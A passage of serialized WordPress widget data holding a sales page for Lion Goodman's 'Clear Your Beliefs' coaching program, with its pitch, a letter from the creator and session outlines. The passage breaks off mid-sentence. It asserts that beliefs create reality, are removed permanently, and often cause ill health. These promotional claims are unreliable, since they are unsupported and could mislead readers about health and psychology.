class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:60567:"<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your 